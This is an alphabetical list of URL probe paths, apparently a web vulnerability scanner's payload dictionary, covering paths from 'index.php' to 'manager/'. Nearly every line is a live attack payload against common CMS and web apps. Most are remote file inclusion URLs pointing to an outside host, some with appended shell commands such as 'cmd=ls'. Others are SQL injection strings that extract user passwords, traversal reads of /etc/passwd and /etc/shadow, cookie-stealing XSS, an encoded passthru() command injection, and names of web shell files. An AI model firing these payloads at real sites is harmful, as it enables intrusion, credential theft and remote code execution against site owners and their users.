index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
index.php?m=tag&a=view&name=ccccc%bf'and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
index.php?main_tabid=1&main_content=http://www.yxlink.com/nvs_test.txt
index.php?may=http://www.yxlink.com/nvs_test.txt
index.php?menuitem=26&domeinvraag=\x22><script>alert(333)</script>&aktie=Zoek&idx=23
index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+md5(333)--
index.php?method='
index.php?middle=http://www.yxlink.com/nvs_test.txt
index.php?mode=http://www.yxlink.com/nvs_test.txt
index.php?mode=http://www.yxlink.com/nvs_test.txt?&cmd=
index.php?modpath=http://www.yxlink.com/nvs_test.txt
index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=changestate&viewname=10\x22'%20onmouseover=alert(/XSS/)%20x='&errormsg=
index.php?module=Calendar&action=EditView&return_module=Contacts&return_action=DetailView&activity_mode=Events&return_id=29&contact_id=><script>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing
index.php?module=Calendar&action=EditView&return_module=Leads&return_action=DetailView&activity_mode=Events&return_id=37&parent_id=37\x22><script>alert(/XSS/)</script>&parenttab=Marketin
index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaignname&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_text=test&action=index&parenttab=Marketing&search_cnt=
index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&pbss_edit=true
index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
index.php?module=PostWrap&page=http://www.yxlink.com/nvs_test.txt
index.php?module=Potentials&action=ListView&date_closed=2006-01'><script>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&leadsource=--None--'><script>alert(1)</script>&query=true&type=dbrd&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospect'><script>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'><script>alert(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10
index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-0189b81'><script>alert(1)</script>&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1
index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
index.php?module=Settings&action=createnewgroup&returnaction=listgroups&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;
index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1
index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=view
index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&return_url=\x22><script>alert(/XSS/)</script>
index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'\x22><script>alert(/XSS/)</script>&return_url=1
index.php?module=search&user=search&search=%22%3E%3Ch1%3EXSS%3C%2Fh1%3E&alternate=local&mod_title=all&submit=Search
index.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?news7[\x5C\x22functions\x5C\x22]=http://www.yxlink.com/nvs_test.txt
index.php?news_include_path=http://www.yxlink.com/nvs_test.txt
index.php?offset=[%20Problem%20Here%20]
index.php?open=http://www.yxlink.com/nvs_test.txt
index.php?option=>\x22><script>alert(33333)</script>&Itemid=1
index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+md5(333))+from+joomla_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
index.php?option=com_custompages&cpage=http://www.yxlink.com/nvs_test.txt?
index.php?option=com_frontpage&Itemid=>\x22><script>alert(2222)</script>
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cmd5(333)%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_spidercatalog&amp;amp;product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%md5%28333%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&amp;amp;view=showproduct&amp;amp;page_num=1&amp;amp;back=1
index.php?option=search&searchword=<script>alert(document.cookie);</script>
index.php?page=http://www.yxlink.com/nvs_test.txt
index.php?page=http://www.yxlink.com/nvs_test.txt%00
index.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
index.php?pagehttp://www.yxlink.com/nvs_test.txt
index.php?pagename=http://www.yxlink.com/nvs_test.txt
index.php?pager=http://www.yxlink.com/nvs_test.txt
index.php?pagina=http://www.yxlink.com/nvs_test.txt?
index.php?path_to_folder=http://www.yxlink.com/nvs_test.txt?cmd=id
index.php?pathdir=http://www.yxlink.com/nvs_test.txt
index.php?pg=http://www.yxlink.com/nvs_test.txt
index.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
index.php?plugin=http://www.yxlink.com/nvs_test.txt
index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA==
index.php?principal=http://www.yxlink.com/nvs_test.txt
index.php?proMod=http://www.yxlink.com/nvs_test.txt
index.php?proMod=http://www.yxlink.com/nvs_test.txt?cmd
index.php?project=http://www.yxlink.com/nvs_test.txt
index.php?q=test'union%20select%20md5(333),uname,upass%20from%20appcms_admin_list%20where%20uid%20like%20'
index.php?r=default/index/search&keywords=a%2527)%20and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23&type=all
index.php?rep=<script>alert(document.cookie)</script>
index.php?repinc=http://www.yxlink.com/nvs_test.txt?
index.php?resources/locale/messages.php.
index.php?root_prefix=http://www.yxlink.com/nvs_test.txt
index.php?section=http://www.yxlink.com/nvs_test.txt
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?site=http://www.yxlink.com/nvs_test.txt
index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,md5(333),1,password,1+from+[PREFIX]_user/*
index.php?site_path=http://www.yxlink.com/nvs_test.txt
index.php?sql_debug=1
index.php?styl[top]=http://www.yxlink.com/nvs_test.txt??
index.php?subpath=http://www.yxlink.com/nvs_test.txt
index.php?template=http://www.yxlink.com/nvs_test.txt?
index.php?templates_dir=http://www.yxlink.com/nvs_test.txt?
index.php?theme=http://www.yxlink.com/nvs_test.txt
index.php?themepath=http://www.yxlink.com/nvs_test.txt?
index.php?themesdir=http://www.yxlink.com/nvs_test.txt
index.php?this_path=http://www.yxlink.com/nvs_test.txt?
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; 
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
index.php?topic=te'
index.php?tpl=../../httpd.ini%00
index.php?txt=http://www.yxlink.com/nvs_test.txt
index.php?up=http://www.yxlink.com/nvs_test.txt
index.php?url=http://www.yxlink.com/nvs_test.txt
index.php?url_index=http://www.yxlink.com/nvs_test.txt
index.php?user-getpass
index.php?vo=\x5C\x22><script>alert(document.cookie);</script>
index.php?w=http://www.yxlink.com/nvs_test.txt
index.php?way=http://www.yxlink.com/nvs_test.txt??????????????
index.pl
index1.php?=http://www.yxlink.com/nvs_test.txt
index1.php?inc=http://www.yxlink.com/nvs_test.txt
index1.php?inhalt=http://www.yxlink.com/nvs_test.txt
index2.php?=http://www.yxlink.com/nvs_test.txt
index2.php?content=http://www.yxlink.com/nvs_test.txt
index2.php?option=com_content&task=-99'%20UNION%20SELECT%20md5(333)%20FROM%20mos_users/*&id=24&Itemid=0
index2.php?s=http://www.yxlink.com/nvs_test.txt
index2.php?x=http://www.yxlink.com/nvs_test.txt
indexinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
indexk.php?lib_path=http://www.yxlink.com/nvs_test.txt?
info.php
info.php?file=http://www.yxlink.com/nvs_test.txt
info/
infor.asp?i%64=-1%20union%20select%201,qwbmuname,88888888888888-1,4,5,6+from+lxscms_u
inforadar/jsp/file/file_download.jsp?fileType=file&fileName=../../../../../../../../../../../../../../etc/passwd
inforadar/jsp/xml/init_sysUsers.xml
inhalt.php?dateien[news]=http://www.yxlink.com/nvs_test.txt?
init.php?API_HOME_DIR=http://www.yxlink.com/nvs_test.txt
init.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
initialize.php?hmail_config[includepath]=http://www.yxlink.com/nvs_test.txt&cmd=dir
initiate.php?abs_path=http://www.yxlink.com/nvs_test.txt
inlinemod.php?acuparam=>\x22><ScRiPt>alert(3333)</ScRiPt>
insert.php
install.php
install.php?_NE[AbsPath]=http://www.yxlink.com/nvs_test.txt
install.php?install_dir=http://www.yxlink.com/nvs_test.txt
install.php?step=7&installdir=http://www.yxlink.com/nvs_test.txt
install/
install/config.php?path=http://www.yxlink.com/nvs_test.txt
install/di.php?pathtoserverdata=http://www.yxlink.com/nvs_test.txt
install/header.tpl.php?step=b&steps[b]=cc</title><script>alert(111)</script>
install/includes/class_upgrade.php?chosenlib=http://www.yxlink.com/nvs_test.txt
install/index.php?content_php=http://www.yxlink.com/nvs_test.txt
install/index.php?insLockfile=1
install/install3.php?database=none&cabsolute_path=http://www.yxlink.com/nvs_test.txt
integration/shortstat/configuration.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://www.yxlink.com/nvs_test.txt?
interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://www.yxlink.com/nvs_test.txt?
interface/billing/billing_process.php?srcdir=http://www.yxlink.com/nvs_test.txt?
interface/editors/-custom.php?bField[bf_data]=http://www.yxlink.com/nvs_test.txt
interface/editors/custom.php?bField[bf_data]=http://www.yxlink.com/nvs_test.txt
interface/new/new_patient_save.php?srcdir=http://www.yxlink.com/nvs_test.txt?
intern/admin/?rootdir=http://www.yxlink.com/nvs_test.txt
intern/admin/other/backup.php?admin=1&rootdir=http://www.yxlink.com/nvs_test.txt
intern/clan/member_add.php?rootdir=http://www.yxlink.com/nvs_test.txt
intern/config/forum.php?rootdir=http://www.yxlink.com/nvs_test.txt
intern/config/key_2.php?rootdir=http://www.yxlink.com/nvs_test.txt
interscan/
interscan/cgi-bin/FtpSave.dll?I'm%20Here
intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14\x22><script>alert('XSS')</script>
inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
invoker/invoker.jsp
ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT md5(333) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
ip.inc.php?type=1&cgipath=http://www.yxlink.com/nvs_test.txt
ipchat.php?root_path=http://www.yxlink.com/nvs_test.txt
ipeer_site/?page=http://www.yxlink.com/nvs_test.txt?
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
isx.html
item/?c-1,key-'.html
ivt/ivtserver?parm1=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
j.php
java-plugin/
javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext=<script>alert(333)</script>
javax/
jcms/m_5_5/m_5_5_3/import_style.jsp
jcms/m_5_7/replace/export.jsp?filename=/etc/shadow&savename=pass
jcms/m_5_7/replace/export.jsp?filename=c:/boot.ini&savename=boot
jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
jcms/setup/publishadmin.jsp
jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
jeeadmin/jeecms/login.do
jgb_eng_php3/cfooter.php3
jiance.php
jis/check/zx.jsp?url=http://www.baidu.com/
jis/down.jsp?pathfile=web-inf/config/dbconfig.xml
jis/update/update.jsp
jmx-console/
jmx-console/HtmlAdaptor
jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer
joinus.php?vwar_root=http://www.yxlink.com/nvs_test.txt
joinus.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,MD5(333),pwd,1,1+from+dzp_users+where+id=1-
joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
joomla_path/components/com_articles.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
jquery.min2u6.php
js/bbcodepress/bbcode-form.php?BBCODE_path=http://www.yxlink.com/nvs_test.txt
js/wptable-tinymce.php?ABSPATH=http://www.yxlink.com/nvs_test.txt
js96777.php
jscript.php?my_ms[root]=http://www.yxlink.com/nvs_test.txt?
jsp-examples/
jsp-examples/cal/cal2.jsp?time=\x22/><script>alert(111)</script>
jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(123)</script>
jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(123)</script>
jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(123)</script>
jsp.php
jspSpy.php
jspdocs/
jsps/explorer/help.jsp?title=Test\x22>AAAAAAAA<script>alert(2222)</script>
jspspy.php
junk.aspx
junk.cfm
k.php
k8one.php
k8serv.php
k8team.php
kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.yxlink.com/nvs_test.txt
kernel/loadkernel.php?installPath=http://www.yxlink.com/nvs_test.txt
kill.php
kmitaadmin/kmitam/htmlcode.php?file=http://www.yxlink.com/nvs_test.txt?
kmitaadmin/kmitat/htmlcode.php?file=http://www.yxlink.com/nvs_test.txt? 
ko.php
kqx.php
ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yxlink.com/nvs_test.txt 
l.php
lang/leslangues.php?fichier=http://www.yxlink.com/nvs_test.txt
lang_english/lang_main_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
language/lang_english/lang_activity.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
latestposts.php?forumspath=http://www.yxlink.com/nvs_test.txt
latex.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
layout/default/params.php?gConf[dir][layouts]=http://www.yxlink.com/nvs_test.txt?
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
ldap/authldap.php?includePath=http://www.yxlink.com/nvs_test.txt
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\x5C\x22Vulnerable\x5C\x22)</script>
learnPath/include/scormExport.inc.php?includePath=http://www.yxlink.com/nvs_test.txt
lib.editor.inc.php?sys_path=http://www.yxlink.com/nvs_test.txt?
lib/Loggix/Module/Calendar.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/Loggix/Module/Comment.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/Loggix/Module/Rss.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/Loggix/Module/Trackback.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/action/rss.php?lib=http://www.yxlink.com/nvs_test.txt?
lib/activeutil.php?set[include_path]=http://www.yxlink.com/nvs_test.txt?
lib/addressbook.php?GLOBALS[basedir]=http://www.yxlink.com/nvs_test.txt
lib/armygame.php?libpath=http://www.yxlink.com/nvs_test.txt
lib/auth.inc.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/authuser.php?root=http://www.yxlink.com/nvs_test.txt
lib/base.php?BaseCfg[BaseDir]=http://www.yxlink.com/nvs_test.txt
lib/connect.php?root=http://www.yxlink.com/nvs_test.txt
lib/connected_users.lib.php3?ChatPath=http://www.yxlink.com/nvs_test.txt
lib/db/mysql.class.php?root=http://www.yxlink.com/nvs_test.txt
lib/db/postgres.class.php?root=http://www.yxlink.com/nvs_test.txt
lib/document.class.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/email.inc.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/folder.class.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/functions.php?DOC_ROOT=http://www.yxlink.com/nvs_test.txt
lib/googlesearch/GoogleSearch.php?APP[path][lib]=http://www.yxlink.com/nvs_test.txt?
lib/header.php?DOC_ROOT=http://www.yxlink.com/nvs_test.txt
lib/language.php?_LIB_DIR=http://www.yxlink.com/nvs_test.txt
lib/lib.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
lib/lib.repo.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
lib/lib.teleskill.php?GLOBALS[where_scs]=http://www.yxlink.com/nvs_test.txt
lib/live_status.lib.php?ROOT=http://www.yxlink.com/nvs_test.txt
lib/misc.php?root=http://www.yxlink.com/nvs_test.txt
lib/nl/nl.php?g_strRootDir=http://www.yxlink.com/nvs_test.txt
lib/obj/collection.class.php?GLOBALS[application][app_root]=http://www.yxlink.com/nvs_test.txt
lib/obj/content_image.class.php?GLOBALS[application][app_root]=http://www.yxlink.com/nvs_test.txt
lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
lib/pcltrace.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
lib/rs.php?rootpath=http://www.yxlink.com/nvs_test.txt
lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.yxlink.com/nvs_test.txt
lib/smarty/SmartyFU.class.php?system[smarty][dir]=http://www.yxlink.com/nvs_test.txt
lib/static/header.php?set_menu=http://www.yxlink.com/nvs_test.txt
lib/tpl.inc.php?conf[classpath]=http://www.yxlink.com/nvs_test.txt
libraries/comment/postComment.php?path[cb]=http://www.yxlink.com/nvs_test.txt?a=
libraries/database.php?path=http://www.yxlink.com/nvs_test.txt???
libraries/grab_globals.lib.php?inc_dir=http://www.yxlink.com/nvs_test.txt
libraries/lib-remotehost.inc.php?phpAds_geoPlugin=http://www.yxlink.com/nvs_test.txt
libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
library/authorize.php?login_form=http://www.yxlink.com/nvs_test.txt?
library/lib.php?root=http://www.yxlink.com/nvs_test.txt
library/translation.inc.php?GLOBALS[srcdir]=http://www.yxlink.com/nvs_test.txt?
libs/db.php?path_local=http://www.yxlink.com/nvs_test.txt
libs/ftp.php?path_local=http://www.yxlink.com/nvs_test.txt
libs/lom.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
libsecure.php?abs_path=http://www.yxlink.com/nvs_test.txt?
license.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
link.php?act=go&city=fujian&url='and(select/**/1/**/from(select/**/count(*),concat((select/**/concat(md5(333))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'
link_main.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
linkadmin.php?page=http://www.yxlink.com/nvs_test.txt?
links.php?op=viewslink&amp;sid=-1/**/union/**/select/**/0,md5(333)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=http://www.yxlink.com/nvs_test.txt
list.asp?agent=-1%20union%20select%20md5(111),0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201
list.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=http://www.yxlink.com/nvs_test.txt
lms_path/modules/welcome.php?_LIB_DIR=http://www.yxlink.com/nvs_test.txt
load_lang.php?_SERWEB[configdir]=http://www.yxlink.com/nvs_test.txt
load_lang.php?_SERWEB[serwebdir]=http://www.yxlink.com/nvs_test.txt
load_phplib.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt
loader.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
local/lib/lcUser.php?LIBDIR=http://www.yxlink.com/nvs_test.txt?
localstart.asp
log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27javascript:alert(%22xss%22)%27%3E
log.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
login.aspx?postusername=\x22><iframe src=\x22http://www.baidu.com\x22>
login.jsp
login.php3?cl_headers=http://www.yxlink.com/nvs_test.txt
login.php?Cmd=error&Code=-5&Lang=\x22></a></span><script>alert(\x2212345678\x22)</script>
login.php?action=quit&pre_url=http://www.baidu.com
login.php?base_dir=http://www.yxlink.com/nvs_test.txt
login.php?blog_theme=http://www.yxlink.com/nvs_test.txt
login.php?langfile=http://www.yxlink.com/nvs_test.txt
login.php?pachtofile=http://www.yxlink.com/nvs_test.txt
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
login.php?srcdir=http://www.yxlink.com/nvs_test.txt?
login.php?value=http://www.yxlink.com/nvs_test.txt??
login.pl?course_id=\x5C\x22>&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
login.wcap?calid=&calname=&date=&fmt-out=<script>alert(document.cookie)</script>&view=&locale=&tzid=&test=1229606492214&user=test&password=test
login/
login/FilepathLogin.html?reason=<script>alert(0)</script>
login/Jeecms.do
login/eWebEditorNet/admin/login.aspx
login/eWebEditorNet/admin_login.aspx
login/editor/admin/login.aspx
login/editor/admin/login.php
login/editor/admin_login.asp
login/editor/admin_login.aspx
login/editor/admin_login.php
login/editor/login.asp
login/eweb/admin_login.asp
login/ewebeditor/admin/login.aspx
login/ewebeditor/admin/login.php
login/ewebeditor/admin_login.asp
login/ewebeditor/admin_login.aspx
login/ewebeditor/admin_login.php
login/ewebeditor/login.asp
login/sm_login_screen.php?error=\x5C\x22><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\x5C\x22><script>alert('Vulnerable')</script>
login/webeditor/admin_login.asp
loginreq2.php?subgroupname=\x22><script>alert(666)</script>
logins.html
logviewer.jsp?clearLog=false&emailLog=false&lines=&log=%22/%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&markLog=false&mode=desc&refresh=&saveLog=false
lovecms/install/index.php?step=http://www.yxlink.com/nvs_test.txt?
lpt9
lpt9.xtp
ls
m.php
m2f/m2f_cron.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
m2f/m2f_forum.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
m2f/m2f_mailinglist.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
m2f/m2f_phpbb204.php?m2f_root_path=http://www.yxlink.com/nvs_test.txt
maguz.php?site=http://www.yxlink.com/nvs_test.txt
mail/addressaction.html?id=<USERID
mail/childwindow.inc.php?form=http://www.yxlink.com/nvs_test.txt
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.yxlink.com/nvs_test.txt
mail/mmex.php?Setings=http://www.yxlink.com/nvs_test.txt
mail_this_entry/mail_autocheck.php?pm_path=http://www.yxlink.com/nvs_test.txt?&cmd=ls
mailer3.php
mailmain?intertype=ajax&type=getAllUserList_simple
mailman/admin/ml-name?\x5C\x22><script>alert('Vulnerable')</script>;
mailman/listinfo
mailman/listinfo/<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
main.cgi?next_file=/etc/passwd
main.inc.php?pathtoscript=http://www.yxlink.com/nvs_test.txt
main.php?config[search_disp]=true&include_dir=http://www.yxlink.com/nvs_test.txt
main.php?id=http://www.yxlink.com/nvs_test.txt
main.php?include_path=http://www.yxlink.com/nvs_test.txt
main.php?pageURL=http://www.yxlink.com/nvs_test.txt
main.php?pagina=http://www.yxlink.com/nvs_test.txt
main/forum/komentar.php?site_path=http://www.yxlink.com/nvs_test.txt
main/main.php?pi=http://www.yxlink.com/nvs_test.txt
main/ppcbannerclick.php?INC=http://www.yxlink.com/nvs_test.txt?
main/ppcclick.php?INC=http://www.yxlink.com/nvs_test.txt?
main_page.php
main_prepend.php?_SERWEB[functionsdir]=http://www.yxlink.com/nvs_test.txt
mainpage.php?docroot=http://www.yxlink.com/nvs_test.txt?cmd
mambo/administrator/phpinfo.php
mambo/index.php?Itemid=JUNK(5)
mamboleto.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
man2html
manage/
manage/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manage/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manage/eWebEditorNet/admin/login.aspx
manage/eWebEditorNet/admin_login.aspx
manage/editor/admin/login.aspx
manage/editor/admin_login.asp
manage/editor/admin_login.aspx
manage/editor/admin_login.php
manage/editor/login.asp
manage/editor/login.php
manage/eweb/admin_login.asp
manage/ewebeditor/admin/login.php
manage/ewebeditor/admin_login.asp
manage/ewebeditor/admin_login.aspx
manage/ewebeditor/admin_login.php
manage/ewebeditor/login.asp
manage/ewebeditor/login.aspx
manage/webeditor/admin_login.asp
manage123/
manage_songs.php?foing_root_path=http://www.yxlink.com/nvs_test.txt
manager/
manager/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manager/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
manager/admin/index.php?MGR=http://www.yxlink.com/nvs_test.txt
manager/admin/p_ins.php?MGR=http://www.yxlink.com/nvs_test.txt
manager/admin/u_ins.php?MGR=http://www.yxlink.com/nvs_test.txt
